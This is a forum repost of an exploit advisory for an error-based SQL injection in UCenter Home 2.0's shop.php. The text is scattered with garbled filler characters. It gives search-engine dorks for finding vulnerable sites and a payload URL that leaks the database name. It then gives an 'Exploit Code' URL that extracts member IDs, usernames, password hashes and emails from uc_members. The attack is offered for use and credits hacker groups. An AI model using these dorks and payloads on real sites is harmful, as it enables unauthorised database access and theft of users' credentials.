% j. }# f; {( o! R" x; N
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
, ]! Y# `$ c2 X& G& Z0 l4 ]( v" Y& @4 _5 i
& z8 T4 x- Z3 |
( I5 \& t4 y4 Z: A4 P- X: {
*/ Author : KnocKout " [$ R# f- y7 J; m& [# ~+ h
$ |% G( e5 i/ ^ s% L V3 z' o, F
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers % G( u( y7 m5 p/ ^" u* O! a
& r" P% x/ e% \3 P9 r4 m4 y U, l*/ Contact: knockoutr@msn.com
+ K9 H) P+ m( ^7 z! H0 C
3 F2 i* ?- g) z*/ Cyber-Warrior.org/CWKnocKout
% W4 f/ T% U: n; D1 D9 q; x# @. e7 Y/ p
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 h# M& i, E$ L) ~1 U7 j3 x8 C# t1 q6 k& I4 v3 w6 P1 K
Script : UCenter Home ) p K; V" g: u" k3 J: Q8 y
3 S5 N! b. U, E3 K# v$ ]6 a$ `
Version : 2.0 ( y0 s5 n6 V8 C; H2 H
9 M* `5 b. f8 r: CScript HomePage : http://u.discuz.net/ $ o# |3 r8 n/ \
5 A4 z2 K- z( a1 o: a$ m$ o5 F
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' |8 w, |7 m- D2 }
& ]3 x* g. h8 lDork : Powered by UCenter inurl:shop.php?ac=view 6 a* X: }" M' B
, c) d- P$ b7 ?: g& V) o/ _Dork 2 : inurl:shop.php?ac=view&shopid= 1 S9 J; _1 T G8 Y* G! I3 I
2 L/ E N. _7 [, N \
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % W' P6 A7 O/ C
. R% M/ \: w; q* nVuln file : Shop.php ) V+ r' ~! a0 @0 B# l+ t& K
# \5 b. [% v" v5 E# ovalue's : (?)ac=view&shopid=
( y; Y5 N% g( _, A* t; \& z5 X7 _. A
7 p% s0 L6 E" x1 {1 H0 sVulnerable Style : SQL Injection (MySQL Error Based) " R/ ^* |9 b; C* V& Y. J0 j0 N6 W
; f' N8 f2 D$ v$ q( ~' UNeed Metarials : Hex Conversion
7 S7 r7 F9 N7 h7 U7 c
9 F- A' i0 O; I# j1 X# d( h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 n) y% c* [) d* H
& r0 p F& g4 fYour Need victim Database name.
. ]- x( ?$ O9 z W+ L
# Y! w; f3 R, P0 i! e4 d' _2 \; Qfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 O, _# |9 N4 k1 I
9 D/ f- F7 }6 Z, G+ J..
* H8 d; p2 p5 I
, ~/ ~1 { @8 dDB : Okey.
5 V/ j$ ~7 I) [$ J* n
7 L K4 r# W' S5 Syour edit DB `[TARGET DB NAME]`
0 s0 o# O3 Z. L# I$ N- k! V6 E. d- U+ _* \. V" S; Z# p
Example : 'hiwir1_ucenter'
; s6 g" x1 I M& U8 _$ t( x/ w7 `9 \" [& C6 w' p
Edit : Okey.
; i1 I. V: Q" e4 |; Y3 Z9 B/ Y% q
9 P* x! @0 |: k) n! pYour use Hex conversion. And edit Your SQL Injection Exploit.. ! \; x: ^. j' |5 D/ e
8 g6 ?% G7 Z6 I+ V0 u % d: U' I! N0 I5 Z5 o2 [
8 C6 I! `( l0 O. n) Q/ u V" B# R5 CExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ?& ^# s! S) f4 q5 C" _
|
发表于 2013-2-27 21:31:31
收藏
支持
反对